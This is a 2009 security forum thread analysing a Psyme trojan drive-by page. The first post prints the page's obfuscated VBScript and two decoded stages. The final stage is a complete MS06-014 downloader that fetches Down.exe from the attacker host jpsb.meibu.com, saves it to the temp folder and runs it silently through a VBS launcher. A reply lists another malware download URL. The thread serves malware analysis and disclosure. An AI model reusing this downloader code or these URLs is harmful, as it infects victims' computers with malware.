Author Topic: jpsb.meibu.com (Psyme.EU trojan)  (Read 2463 times)

0 Members and 1 Guest are viewing this topic.

May 07, 2009, 12:31:43 am
Read 2463 times

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Loaded from;

hxxp://www.schpaa.com/humor

Loads;

jpsb.meibu.com/Ms06014.htm

Code: [Select]
Cn911="83,61,34,52,70,54,69,50,48,52,53,55,50,55,50,54,70,55,50,50,48,53,50,54,53,55,51,55,53,54,68,54,53,50,48,52,69,54,53,55,56,55,52,48,68,48,65,52,51,54,69,52,67,53,50,53,53,51,68,50,50,54,56,55,52,55,52,55,48,51,65,50,70,50,70,54,65,55,48,55,51,54,50,50,69,54,68,54,53,54,57,54,50,55,53,50,69,54,51,54,70,54,68,50,70,52,52,54,70,55,55,54,69,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,70,54,50,50,48,51,68,50,48,54,52,54,70,54,51,55,53,54,68,54,53,54,69,55,52,50,69,54,51,55,50,54,53,54,49,55,52,54,53,52,53,54,67,54,53,54,68,54,53,54,69,55,52,50,56,50,50,54,70,54,50,50,50,50,54,50,50,54,65,54,53,50,50,50,54,50,50,54,51,50,50,50,54,50,50,55,52,50,50,50,57,48,68,48,65,52,70,54,50,50,69,53,51,54,53,55,52,52,49,55,52,55,52,55,50,54,57,54,50,55,53,55,52,54,53,50,48,50,50,54,51,54,67,54,49,50,50,50,54,50,50,55,51,55,51,54,57,54,52,50,50,50,67,50,48,50,50,54,51,50,50,50,54,50,50,54,67,55,51,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,52,51,65,52,50,52,52,51,57,50,50,50,54,50,50,51,54,52,51,51,53,51,53,50,50,50,54,50,50,51,54,50,68,51,54,51,53,50,50,50,54,50,50,52,49,51,51,50,68,51,49,51,49,52,52,51,48,50,50,50,54,50,50,50,68,51,57,51,56,51,51,52,49,50,68,51,48,51,48,52,51,50,50,50,54,50,50,51,48,51,52,52,54,52,51,51,50,51,57,50,50,50,54,50,50,52,53,51,51,51,54,50,50,48,68,48,65,55,51,52,56,53,52,53,52,53,48,51,68,50,50,52,68,50,50,50,54,50,50,54,57,54,51,50,50,50,54,50,50,55,50,54,70,50,50,50,54,50,50,55,51,50,50,50,54,50,50,54,70,54,54,50,50,50,54,50,50,55,52,50,50,50,54,50,50,50,69,53,56,50,50,50,54,50,50,52,68,50,50,50,54,50,50,52,67,50,50,50,54,50,50,52,56,50,50,50,54,50,50,53,52,53,52,50,50,50,54,50,50,53,48,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,48,54,70,55,48,50,48,51,68,50,48,52,70,54,50,50,69,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,52,56,53,52,53,52,53,48,50,67,50,50,50,50,50,57,48,68,48,65,53,48,54,70,55,48,50,69,52,70,55,48,54,53,54,69,50,48,50,50,52,55,50,50,50,54,50,50,52,53,53,52,50,50,50,67,50,48,52,51,54,69,52,67,53,50,53,53,50,67,50,48,52,54,54,49,54,67,55,51,54,53,48,68,48,65,53,48,54,70,55,48,50,69,53,51,54,53,54,69,54,52,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,54,53,55,56,54,53,50,50,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,50,50,52,51,54,69,50,50,50,54,50,50,51,57,51,49,50,50,50,54,50,50,51,49,50,69,55,54,54,50,55,51,50,50,48,68,48,65,53,51,54,53,55,52,50,48,52,54,53,48,52,57,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,53,51,54,51,55,50,54,57,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,52,54,57,54,69,54,55,50,69,52,54,50,50,50,54,50,50,54,57,50,50,50,54,50,50,54,67,54,53,50,50,50,54,50,50,53,51,55,57,50,50,50,54,50,50,55,51,55,52,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,68,52,70,50,50,50,54,50,50,54,50,54,65,54,53,50,50,50,54,50,50,54,51,55,52,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,51,54,53,55,52,50,48,55,51,53,52,54,68,55,48,50,48,51,68,50,48,52,54,53,48,52,57,50,69,52,55,54,53,55,52,53,51,55,48,54,53,54,51,54,57,54,49,54,67,52,54,54,70,54,67,54,52,54,53,55,50,50,56,51,50,50,57,48,68,48,65,52,53,55,56,54,53,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,57,48,68,48,65,53,54,54,50,55,51,52,69,54,49,54,68,54,53,51,68,52,54,53,48,52,57,50,69,52,50,55,53,54,57,54,67,54,52,53,48,54,49,55,52,54,56,50,56,55,51,53,52,54,68,55,48,50,67,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,57,48,68,48,65,52,49,52,49,51,68,50,50,52,49,50,50,50,54,50,50,54,52,50,50,48,68,48,65,52,49,52,50,51,68,50,50,54,70,50,50,50,54,50,50,54,52,50,50,50,54,50,50,54,50,50,50,50,54,50,50,50,69,50,50,50,54,50,50,55,51,50,50,50,54,50,50,55,52,55,50,54,53,50,50,50,54,50,50,54,49,54,68,50,50,48,68,48,65,52,49,54,52,52,68,51,68,52,49,52,49,50,54,52,49,52,50,48,68,48,65,53,51,54,53,55,52,50,48,52,50,54,52,54,49,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,52,49,54,52,52,68,50,67,50,50,50,50,50,57,48,68,48,65,52,50,54,52,54,49,50,69,55,52,55,57,55,48,54,53,51,68,51,49,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,50,48,53,48,54,70,55,48,50,69,53,50,54,53,55,51,55,48,54,70,54,69,55,51,54,53,52,50,54,70,54,52,55,57,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,52,50,54,52,54,49,50,69,53,52,55,57,55,48,54,53,51,68,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,70,55,48,54,53,54,69,48,68,48,65,52,50,54,52,54,49,50,69,53,55,55,50,54,57,55,52,54,53,53,52,54,53,55,56,55,52,50,48,50,50,52,70,54,69,50,48,52,53,55,50,55,50,54,70,55,50,50,48,53,50,54,53,55,51,55,53,54,68,54,53,50,48,52,69,54,53,55,56,55,52,50,50,50,54,55,54,54,50,52,51,55,50,52,67,54,54,50,54,50,50,53,55,55,51,54,51,55,50,54,57,55,48,55,52,50,69,52,51,55,50,54,53,54,49,55,52,54,53,52,70,54,50,54,65,54,53,54,51,55,52,50,56,50,50,50,50,53,55,55,51,54,51,55,50,54,57,55,48,55,52,50,69,53,51,54,56,54,53,54,67,54,67,50,50,50,50,50,57,50,69,53,50,55,53,54,69,50,48,50,50,50,50,50,50,50,54,52,53,55,56,54,53,52,69,54,49,54,68,54,53,50,54,50,50,50,50,50,50,50,50,48,68,48,65,52,50,54,52,54,49,50,69,53,51,54,49,55,54,54,53,55,52,54,70,54,54,54,57,54,67,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,51,50,48,68,48,65,52,50,54,52,54,49,50,69,52,51,54,67,54,70,55,51,54,53,48,68,48,65,55,51,53,50,55,53,54,69,51,68,50,50,53,51,50,50,50,54,50,50,54,56,50,50,50,54,50,50,54,53,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,67,50,50,50,54,50,50,50,69,50,50,50,54,50,50,52,49,50,50,50,54,50,50,55,48,50,50,50,54,50,50,55,48,50,50,50,54,50,50,54,67,50,50,50,54,50,50,54,57,50,50,48,68,48,65,53,51,54,53,55,52,50,48,53,50,55,53,54,69,50,48,51,68,50,48,52,70,54,50,50,69,54,51,55,50,54,53,54,49,55,52,54,53,54,70,54,50,54,65,54,53,54,51,55,52,50,56,55,51,53,50,55,53,54,69,50,54,50,50,54,51,54,49,55,52,54,57,54,70,54,69,50,50,50,67,50,50,50,50,50,57,48,68,48,65,53,50,55,53,54,69,50,69,53,51,54,56,54,53,54,67,54,67,52,53,55,56,54,53,54,51,55,53,55,52,54,53,50,48,53,54,54,50,55,51,52,69,54,49,54,68,54,53,50,67,50,50,50,50,50,67,50,50,50,50,50,67,50,50,52,70,55,48,54,53,54,69,50,50,50,67,51,48,34,58,68,61,34,69,88,69,67,85,84,69,32,34,34,34,34,34,58,67,61,34,38,67,72,82,40,38,72,34,58,78,61,34,41,34,58,68,79,32,87,72,73,76,69,32,76,69,78,40,83,41,62,49,58,73,70,32,73,83,78,85,77,69,82,73,67,40,76,69,70,84,40,83,44,49,41,41,32,84,72,69,78,32,68,61,68,38,67,38,76,69,70,84,40,83,44,50,41,38,78,58,83,61,77,73,68,40,83,44,51,41,32,69,76,83,69,32,68,61,68,38,67,38,76,69,70,84,40,83,44,52,41,38,78,58,83,61,77,73,68,40,83,44,53,41,13,10,76,79,79,80,58,69,88,69,67,85,84,69,32,68"
Function Rechange(Q)
S=Split(Q,",")
Cn922=""
For i = 0 To UBound(S)
Cn922=Cn922&Chr(eval(S(i)))
Next
Rechange=Cn922
End Function
EXECUTE(Rechange(Cn911))

Decodes to;

Code: [Select]
S="4F6E204572726F7220526573756D65204E6578740D0A436E4C52553D22687474703A2F2F6A7073622E6D656962752E636F6D2F446F776E2E657865220D0A536574204F62203D20646F63756D656E742E637265617465456C656D656E7428226F622226226A65222622632226227422290D0A4F622E5365744174747269627574652022636C6122262273736964222C2022632226226C7322262269222622643A42443922262236433535222622362D363522262241332D313144302226222D393833412D303043222622303446433239222622453336220D0A73485454503D224D2226226963222622726F222622732226226F66222622742226222E582226224D2226224C22262248222622545422262250220D0A53657420506F70203D204F622E4372656174654F626A6563742873485454502C2222290D0A506F702E4F70656E2022472226224554222C20436E4C52552C2046616C73650D0A506F702E53656E640D0A4578654E616D653D22436E2226223931222622312E657865220D0A5662734E616D653D22436E2226223931222622312E766273220D0A53657420465049203D204F622E6372656174656F626A6563742822536372692226227022262274696E672E46222622692226226C6522262253792226227374222622652226226D4F222622626A652226226374222C2222290D0A5365742073546D70203D204650492E4765745370656369616C466F6C6465722832290D0A4578654E616D653D4650492E4275696C64506174682873546D702C4578654E616D65290D0A5662734E616D653D4650492E4275696C64506174682873546D702C5662734E616D65290D0A41413D224122262264220D0A41423D226F22262264222622622226222E22262273222622747265222622616D220D0A41644D3D41412641420D0A53657420426461203D204F622E6372656174656F626A6563742841644D2C2222290D0A4264612E747970653D310D0A4264612E4F70656E0D0A4264612E577269746520506F702E526573706F6E7365426F64790D0A4264612E53617665746F66696C65204578654E616D652C320D0A4264612E436C6F73650D0A4264612E547970653D320D0A4264612E4F70656E0D0A4264612E57726974655465787420224F6E204572726F7220526573756D65204E6578742226766243724C662622577363726970742E4372656174654F626A656374282222577363726970742E5368656C6C2222292E52756E20222222264578654E616D6526222222220D0A4264612E53617665746F66696C65205662734E616D652C320D0A4264612E436C6F73650D0A7352756E3D225322262268222622652226226C2226226C2226222E2226224122262270222622702226226C22262269220D0A5365742052756E203D204F622E6372656174656F626A656374287352756E2622636174696F6E222C2222290D0A52756E2E5368656C6C45786563757465205662734E616D652C22222C22222C224F70656E222C30":D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMERIC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEFT(S,4)&N:S=MID(S,5)
LOOP:EXECUTE D

Finally decodes to;

Code: [Select]
On Error Resume Next
CnLRU="http://jpsb.meibu.com/Down.exe"
Set Ob = document.createElement("ob"&"je"&"c"&"t")
Ob.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36"
sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P"
Set Pop = Ob.CreateObject(sHTTP,"")
Pop.Open "G"&"ET", CnLRU, False
Pop.Send
ExeName="Cn"&"91"&"1.exe"
VbsName="Cn"&"91"&"1.vbs"
Set FPI = Ob.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
Set sTmp = FPI.GetSpecialFolder(2)
ExeName=FPI.BuildPath(sTmp,ExeName)
VbsName=FPI.BuildPath(sTmp,VbsName)
AA="A"&"d"
AB="o"&"d"&"b"&"."&"s"&"tre"&"am"
AdM=AA&AB
Set Bda = Ob.createobject(AdM,"")
Bda.type=1
Bda.Open
Bda.Write Pop.ResponseBody
Bda.Savetofile ExeName,2
Bda.Close
Bda.Type=2
Bda.Open
Bda.WriteText "On Error Resume Next"&vbCrLf&"Wscript.CreateObject(""Wscript.Shell"").Run """&ExeName&""""
Bda.Savetofile VbsName,2
Bda.Close
sRun="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"
Set Run = Ob.createobject(sRun&"cation","")
Run.ShellExecute VbsName,"","","Open",0
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 07, 2009, 01:22:33 am
Reply #1

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
didn't check exactly what he does, but one of the things he download is:
Code: [Select]
www.mokpo29.pe.kr/bbs/icon/private_icon/WLoader.exehttp://www.virustotal.com/analisis/be2d25f3591cf2401b7c29c7a4f08a3a
Mal-Aware